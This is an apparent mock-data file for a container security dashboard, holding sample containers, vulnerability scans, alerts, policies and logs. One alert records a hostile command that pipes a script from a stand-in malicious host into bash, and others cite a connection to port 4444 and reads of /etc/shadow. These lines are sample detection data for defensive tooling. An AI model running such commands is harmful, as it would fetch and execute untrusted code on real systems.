// Container data
export const containers = [
  {
    id: 'c-1',
    name: 'web-frontend-prod',
    status: 'running',
    image: 'nginx:latest',
    created: '2025-05-10T14:30:00',
    cpu: 12,
    memory: 45,
    anomalyScore: 2,
    vulnerabilities: 1,
  },
  {
    id: 'c-2',
    name: 'api-service-prod',
    status: 'running',
    image: 'node:18',
    created: '2025-05-09T10:15:00',
    cpu: 38,
    memory: 62,
    anomalyScore: 15,
    vulnerabilities: 7,
  },
  {
    id: 'c-3',
    name: 'db-postgres-prod',
    status: 'running',
    image: 'postgres:15',
    created: '2025-05-08T08:45:00',
    cpu: 25,
    memory: 70,
    anomalyScore: 0,
    vulnerabilities: 0,
  },
  {
    id: 'c-4',
    name: 'cache-redis-prod',
    status: 'running',
    image: 'redis:alpine',
    created: '2025-05-07T16:20:00',
    cpu: 8,
    memory: 30,
    anomalyScore: 0,
    vulnerabilities: 2,
  },
  {
    id: 'c-5',
    name: 'auth-service-prod',
    status: 'running',
    image: 'auth-service:1.2.3',
    created: '2025-05-06T12:10:00',
    cpu: 18,
    memory: 50,
    anomalyScore: 28,
    vulnerabilities: 12,
  },
  {
    id: 'c-6',
    name: 'messaging-queue',
    status: 'restarting',
    image: 'rabbitmq:3.9',
    created: '2025-05-05T09:30:00',
    cpu: 42,
    memory: 65,
    anomalyScore: 76,
    vulnerabilities: 5,
  },
];

// Security scan results
export const scanResults = [
  {
    id: 's-1',
    containerId: 'c-1',
    timestamp: '2025-05-10T16:30:00',
    status: 'OK',
    details: 'No critical issues found',
    vulnerabilities: [],
  },
  {
    id: 's-2',
    containerId: 'c-2',
    timestamp: '2025-05-10T16:25:00',
    status: 'Warning',
    details: 'Medium severity vulnerabilities detected',
    vulnerabilities: [
      {
        id: 'CVE-2025-1234',
        severity: 'medium',
        package: 'openssl',
        description: 'Buffer overflow vulnerability in OpenSSL',
      },
      {
        id: 'CVE-2025-5678',
        severity: 'low',
        package: 'nodejs',
        description: 'DOS vulnerability in HTTP parser',
      },
    ],
  },
  {
    id: 's-3',
    containerId: 'c-3',
    timestamp: '2025-05-10T16:20:00',
    status: 'OK',
    details: 'No issues found',
    vulnerabilities: [],
  },
  {
    id: 's-4',
    containerId: 'c-4',
    timestamp: '2025-05-10T16:15:00',
    status: 'OK',
    details: 'Minor issues found',
    vulnerabilities: [
      {
        id: 'CVE-2025-9876',
        severity: 'low',
        package: 'redis',
        description: 'Information disclosure in Redis connection handler',
      },
    ],
  },
  {
    id: 's-5',
    containerId: 'c-5',
    timestamp: '2025-05-10T16:10:00',
    status: 'Critical',
    details: 'Critical vulnerabilities detected',
    vulnerabilities: [
      {
        id: 'CVE-2025-4321',
        severity: 'critical',
        package: 'auth-lib',
        description: 'Authentication bypass vulnerability',
      },
      {
        id: 'CVE-2025-8765',
        severity: 'high',
        package: 'jwt-token',
        description: 'Token validation flaw allowing privilege escalation',
      },
    ],
  },
  {
    id: 's-6',
    containerId: 'c-6',
    timestamp: '2025-05-10T16:05:00',
    status: 'Warning',
    details: 'Multiple security issues detected',
    vulnerabilities: [
      {
        id: 'CVE-2025-2468',
        severity: 'medium',
        package: 'rabbitmq-server',
        description: 'Credentials exposure in log files',
      },
    ],
  },
];

// Alerts/anomalies data
export const alerts = [
  {
    id: 'a-1',
    containerId: 'c-6',
    timestamp: '2025-05-10T16:25:10',
    severity: 'critical',
    message: 'Unusual process execution detected in container',
    details: 'Process: /bin/sh -c curl -s malicious.example.com/script.sh | bash',
  },
  {
    id: 'a-2',
    containerId: 'c-5',
    timestamp: '2025-05-10T16:10:22',
    severity: 'high',
    message: 'Suspicious network connection detected',
    details: 'Outbound connection to 203.0.113.100:4444',
  },
  {
    id: 'a-3',
    containerId: 'c-2',
    timestamp: '2025-05-10T15:45:05',
    severity: 'medium',
    message: 'Sensitive file accessed',
    details: 'File: /etc/shadow accessed by non-root process',
  },
  {
    id: 'a-4',
    containerId: 'c-2',
    timestamp: '2025-05-10T15:30:18',
    severity: 'low',
    message: 'High CPU usage detected',
    details: 'CPU usage at 95% for over 10 minutes',
  },
  {
    id: 'a-5',
    containerId: 'c-6',
    timestamp: '2025-05-10T14:55:30',
    severity: 'critical',
    message: 'Container escape attempt detected',
    details: 'Privilege escalation detected via kernel vulnerability',
  },
];

// Security policies/rules
export const policies = [
  {
    id: 'p-1',
    name: 'Block Unauthorized Network Egress',
    description: 'Block all unauthorized outbound network connections',
    scope: 'global',
    severity: 'high',
    action: 'block',
    enabled: true,
    createdAt: '2025-04-01T10:00:00',
    createdBy: 'Admin User',
  },
  {
    id: 'p-2',
    name: 'Prevent Access to Sensitive Files',
    description: 'Prevent containers from accessing sensitive host files',
    scope: 'production',
    severity: 'critical',
    action: 'alert',
    enabled: true,
    createdAt: '2025-04-05T11:30:00',
    createdBy: 'Admin User',
  },
  {
    id: 'p-3',
    name: 'Limit Container Resource Usage',
    description: 'Alert on containers exceeding resource thresholds',
    scope: 'global',
    severity: 'medium',
    action: 'alert',
    enabled: true,
    createdAt: '2025-04-10T09:15:00',
    createdBy: 'Admin User',
  },
  {
    id: 'p-4',
    name: 'Prevent Privilege Escalation',
    description: 'Block any attempts to elevate privileges in containers',
    scope: 'production',
    severity: 'critical',
    action: 'block',
    enabled: true,
    createdAt: '2025-04-15T14:20:00',
    createdBy: 'Admin User',
  },
  {
    id: 'p-5',
    name: 'Runtime Image Integrity',
    description: 'Verify container image integrity during runtime',
    scope: 'global',
    severity: 'high',
    action: 'alert',
    enabled: false,
    createdAt: '2025-04-20T16:45:00',
    createdBy: 'Admin User',
  },
];

// Logs data
export const logs = [
  {
    id: 'l-1',
    timestamp: '2025-05-10T16:29:10',
    level: 'info',
    source: 'secureflow-agent',
    message: 'Container started: web-frontend-prod',
  },
  {
    id: 'l-2',
    timestamp: '2025-05-10T16:28:55',
    level: 'warning',
    source: 'secureflow-agent',
    message: 'Unusual file access pattern detected in api-service-prod',
  },
  {
    id: 'l-3',
    timestamp: '2025-05-10T16:27:30',
    level: 'error',
    source: 'secureflow-agent',
    message: 'Failed to scan container: messaging-queue (container restarting)',
  },
  {
    id: 'l-4',
    timestamp: '2025-05-10T16:26:45',
    level: 'info',
    source: 'secureflow-policy',
    message: 'Policy "Block Unauthorized Network Egress" triggered for auth-service-prod',
  },
  {
    id: 'l-5',
    timestamp: '2025-05-10T16:25:20',
    level: 'critical',
    source: 'secureflow-agent',
    message: 'Possible attack detected: messaging-queue executing suspicious process',
  },
  {
    id: 'l-6',
    timestamp: '2025-05-10T16:24:15',
    level: 'info',
    source: 'secureflow-api',
    message: 'User "Admin User" logged in from 192.168.1.105',
  },
  {
    id: 'l-7',
    timestamp: '2025-05-10T16:23:50',
    level: 'warning',
    source: 'secureflow-policy',
    message: 'Container messaging-queue violating resource limits: CPU usage 95%',
  },
  {
    id: 'l-8',
    timestamp: '2025-05-10T16:22:30',
    level: 'info',
    source: 'secureflow-agent',
    message: 'Security scan completed for containers: 6 scanned, 2 with issues',
  },
  {
    id: 'l-9',
    timestamp: '2025-05-10T16:21:15',
    level: 'error',
    source: 'secureflow-api',
    message: 'Failed to connect to database, retrying in 5s',
  },
  {
    id: 'l-10',
    timestamp: '2025-05-10T16:20:05',
    level: 'info',
    source: 'secureflow-agent',
    message: 'Agent started on node worker-03 (version 1.5.2)',
  },
];

// Dashboard overview stats
export const dashboardStats = {
  totalContainers: 28,
  runningContainers: 26,
  stoppedContainers: 2,
  totalAlerts: 15,
  criticalAlerts: 2,
  highAlerts: 3,
  mediumAlerts: 5,
  lowAlerts: 5,
  totalVulnerabilities: 127,
  criticalVulnerabilities: 8,
  highVulnerabilities: 24,
  mediumVulnerabilities: 56,
  lowVulnerabilities: 39,
  lastScanTime: '2025-05-10T16:30:00',
};

// Chart data
export const vulnerabilityTrend = [
  { date: '05/04', critical: 12, high: 28, medium: 61, low: 42 },
  { date: '05/05', critical: 10, high: 26, medium: 58, low: 40 },
  { date: '05/06', critical: 11, high: 25, medium: 55, low: 39 },
  { date: '05/07', critical: 9, high: 24, medium: 57, low: 38 },
  { date: '05/08', critical: 9, high: 25, medium: 55, low: 40 },
  { date: '05/09', critical: 8, high: 24, medium: 56, low: 39 },
  { date: '05/10', critical: 8, high: 24, medium: 56, low: 39 },
];

export const alertsByContainer = [
  { name: 'web-frontend-prod', value: 1 },
  { name: 'api-service-prod', value: 2 },
  { name: 'db-postgres-prod', value: 0 },
  { name: 'cache-redis-prod', value: 0 },
  { name: 'auth-service-prod', value: 5 },
  { name: 'messaging-queue', value: 7 },
];

export const resourceUsageTrend = [
  { time: '12:00', cpu: 30, memory: 45 },
  { time: '13:00', cpu: 32, memory: 47 },
  { time: '14:00', cpu: 28, memory: 44 },
  { time: '15:00', cpu: 35, memory: 50 },
  { time: '16:00', cpu: 40, memory: 55 },
  { time: '17:00', cpu: 38, memory: 52 },
];